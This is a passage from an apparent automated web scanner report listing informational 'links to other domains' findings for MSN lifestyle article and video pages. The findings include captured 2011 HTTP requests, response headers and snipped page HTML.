...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344847&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Ffamily-parenting%2Farticle.aspx%3Fcp-documentid%3D27352384%26gt1%3D32060&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.thebump.com?cm_mmc=TB-_-MSN-_-tb%20logo-_-none"><img src="http://blstb.redacted/i/E9/F0113365E35922B35C9826DE2BEA1.gif" width="80" height="30" alt="The Bump" />
...[SNIP]...
<li><a href="http://pregnant.thebump.com/new-mom-new-dad/your-life/articles/fun-ways-to-lose-the-baby-weight.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-lose%20the%20baby%20weight">5 (fun!) ways to lose the baby weight</a>
...[SNIP]...
<li><a href="http://pregnant.thebump.com/toddler.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-50%20things%20about%20toddler">50+ Things you didn't know about your toddler</a>
...[SNIP]...
<li><a href="http://pregnant.thebump.com/new-mom-new-dad/your-life/articles/five-moms-you-will-meet-online.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-8%20moms%20youll%20meet%20online">8 (annoying!) moms you'll meet online</a>
...[SNIP]...
<li><a href="http://community.thebump.com/cs/ks/forums/5039437/ShowForum.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-Chat%20with%20other%20new%20moms%20now">Chat with other new moms now</a>
...[SNIP]...
<li><a href="http://pregnant.thebump.com/pregnancy-baby-message-boards.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-New%20dad">New dad? Read this</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-life/family-parenting/article.aspx?cp-documentid=27352384&OCID=TWT">Tweet</a>
...[SNIP]...
</script><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js" xmlns="http://www.w3.org/1999/xhtml"></script>
...[SNIP]...
'1');" href="http://lifestyle.redacted/your-life/family-parenting/article.aspx?cp-documentid=27352384&gt1=32060&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
href="http://lifestyle.redacted/your-life/family-parenting/article.aspx?cp-documentid=27352384&gt1=32060&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<td><a target="_blank" class="logo" href="http://www.bing.com/?FORM=MSNS71"><span>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
<map id="imap" name="imap"><area href="http://www.facebook.com/MSNLife" alt="MSN Lifestyle Facebook Page" shape="rect" coords="253,3,278,25" /><area href="http://twitter.com/MSNParenting" alt="MSN Parenting Twitter Page" shape="rect" coords="278,5,300,25" /></map>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.107. http://lifestyle.redacted/your-life/family-parenting/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/family-parenting/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/your-life/family-parenting/article.aspx?cp-documentid=27352384&gt1=32060

The response contains the following links to other domains:

http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://community.thebump.com/cs/ks/forums/5039437/ShowForum.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-Chat%20with%20other%20new%20moms%20now
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://pregnant.thebump.com/new-mom-new-dad/your-life/articles/five-moms-you-will-meet-online.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-8%20moms%20youll%20meet%20online
http://pregnant.thebump.com/new-mom-new-dad/your-life/articles/fun-ways-to-lose-the-baby-weight.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-lose%20the%20baby%20weight
http://pregnant.thebump.com/pregnancy-baby-message-boards.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-New%20dad
http://pregnant.thebump.com/toddler.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-50%20things%20about%20toddler
http://twitter.com/MSNParenting
http://twitter.com/share
http://www.bing.com/?FORM=MSNS71
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/MSNLife
http://www.myhomeredacted/
http://www.thebump.com/?cm_mmc=TB-_-MSN-_-tb%20logo-_-none
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406213&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Ffamily-parenting%2Farticle.aspx%3Fcp-documentid%3D27352384%26gt1%3D32060&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:13 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a68ff5afcfc348358fbcb7b48949596c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=941BDD36E9DA49C3A9586D7B92749DAA; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:13 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406213&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Ffamily-parenting%2Farticle.aspx%3Fcp-documentid%3D27352384%26gt1%3D32060&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.thebump.com?cm_mmc=TB-_-MSN-_-tb%20logo-_-none"><img src="http://blstb.redacted/i/E9/F0113365E35922B35C9826DE2BEA1.gif" width="80" height="30" alt="The Bump" />
...[SNIP]...
<li><a href="http://pregnant.thebump.com/new-mom-new-dad/your-life/articles/fun-ways-to-lose-the-baby-weight.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-lose%20the%20baby%20weight">5 (fun!) ways to lose the baby weight</a>
...[SNIP]...
<li><a href="http://pregnant.thebump.com/toddler.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-50%20things%20about%20toddler">50+ Things you didn't know about your toddler</a>
...[SNIP]...
<li><a href="http://pregnant.thebump.com/new-mom-new-dad/your-life/articles/five-moms-you-will-meet-online.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-8%20moms%20youll%20meet%20online">8 (annoying!) moms you'll meet online</a>
...[SNIP]...
<li><a href="http://community.thebump.com/cs/ks/forums/5039437/ShowForum.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-Chat%20with%20other%20new%20moms%20now">Chat with other new moms now</a>
...[SNIP]...
<li><a href="http://pregnant.thebump.com/pregnancy-baby-message-boards.aspx?cm_mmc=TB-_-MSN-_-Sharing%20Your%20Babys%20Life%20Online-_-New%20dad">New dad? Read this</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-life/family-parenting/article.aspx?cp-documentid=27352384&OCID=TWT">Tweet</a>
...[SNIP]...
</script><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js" xmlns="http://www.w3.org/1999/xhtml"></script>
...[SNIP]...
'1');" href="http://lifestyle.redacted/your-life/family-parenting/article.aspx?cp-documentid=27352384&gt1=32060&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
href="http://lifestyle.redacted/your-life/family-parenting/article.aspx?cp-documentid=27352384&gt1=32060&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<td><a target="_blank" class="logo" href="http://www.bing.com/?FORM=MSNS71"><span>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
<map id="imap" name="imap"><area href="http://www.facebook.com/MSNLife" alt="MSN Lifestyle Facebook Page" shape="rect" coords="253,3,278,25" /><area href="http://twitter.com/MSNParenting" alt="MSN Parenting Twitter Page" shape="rect" coords="278,5,300,25" /></map>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.108. http://lifestyle.redacted/your-life/new-year-new-you/video.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/new-year-new-you/video.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/your-life/new-year-new-you/video.aspx?vid=416830b2-ec67-4155-ba51-efe3faacecec&from=en-us_msnhp&gt1=32094

The response contains the following links to other domains:

http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406210&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fnew-year-new-you%2Fvideo.aspx%3Fvid%3D416830b2-ec67-4155-ba51-efe3faacecec%26from%3Den-us_msnhp%26gt1%3D32094&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /your-life/new-year-new-you/video.aspx?vid=416830b2-ec67-4155-ba51-efe3faacecec&from=en-us_msnhp&gt1=32094 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:10 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fad6b51d1d684b029b52f6463e614c4e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=B3E6416FBEF54EF3B255704B0710CF42; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:10 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17658

